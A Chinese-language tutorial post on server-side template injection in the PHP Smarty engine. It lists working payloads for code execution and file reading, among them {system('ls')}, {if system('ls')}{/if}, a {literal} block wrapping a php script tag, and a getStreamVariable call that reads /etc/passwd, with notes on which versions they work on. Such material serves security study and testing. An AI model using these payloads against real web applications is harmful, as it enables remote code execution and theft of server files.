简介:
Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。
了解过Jinjia2模板注入的同学应该知道,jinjia2是基于python的,而Smarty是基于PHP的,所以理解起来还是很容易,我们只需要达到命令执行就可以了。
常用标签:
{php}:
Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令,最常规的思路自然是先测试该标签。
{php}phpinfo(){/php}
但是这个也是要分版本的,Smarty已经废弃{php}标签,强烈建议不要使用。在Smarty 3.1,{php}仅在SmartyBC中可用。
{}
直接输入php命令即可:
{system(‘ls’)}
{literal} 标签
官方手册这样描述这个标签:
{literal}可以让一个模板区域的字符原样输出。 这经常用于保护页面上的Javascript或css样式表,避免因为Smarty的定界符而错被解析。
使用Javascrip语句进行命令之执行,常见的变形语句:
<script language="php">phpinfo();</script>
当然这样的语法,在PHP5里面可以使用,在PHP7里面不可以使用
本地测试一下:
再来看看PHP5:
具体每个版本做了什么改动,可以参考官方手册,回到正题。
因为{literal}支持javascprit语法,所以我们可以RCE,用法如下:
{literal}
<script language="php">phpinfo();</script>
{/literal}
具体能否实现,还要看PHP版本是多少,5可以用,7就不行
调用静态方法(没遇到过 不是很理解这个playload)
通过self获取Smarty类再调用其静态方法实现文件读写
Smarty类的getStreamVariable方法的代码
public function getStreamVariable($variable)
{
$_result = '';
$fp = fopen($variable, 'r+');
if ($fp) {
while (!feof($fp) && ($current_line = fgets($fp)) !== false) {
$_result .= $current_line;
}
fclose($fp);
return $_result;
}
$smarty = isset($this->smarty) ? $this->smarty : $this;
if ($smarty->error_unassigned) {
throw new SmartyException('Undefined stream variable "' . $variable . '"');
} else {
return null;
}
}
这个方法可以读取一个文件并返回其内容
所以我们可以用self来获取Smarty对象并调用这个方法
很多文章里给的payload都形如:
{self::getStreamVariable("file:///etc/passwd")}
但在3.1.30的Smarty版本中官方已经把该静态方法删除
{if}:
{if}标签
官方文档中看到这样的描述:
Smarty的{if}条件判断和PHP的if非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if},也可以使用{else} 和 {elseif},全部的PHP条件表达式和函数都可以在if内使用,如||*, or, &&, and, is_array(), 等等,如:{if is_array($array)}{/if}*
既然全部的PHP函数都可以使用,那么我们是可以利用此来执行我们的代码
{if phpinfo()}{/if}
{if system('ls')}{/if}
总结:
目前Smart版本基本上都是3.1以上,所以很多老的方法可能打不通,比如{php}和调用静态方法。不过{if}和{literal}方法依然是很好用的
网上的文章都是从合天网博客里面整理出来的,建议直接去看他们文章,其他的文章包括我的文章,都是一个小记录
参考链接:文章在这里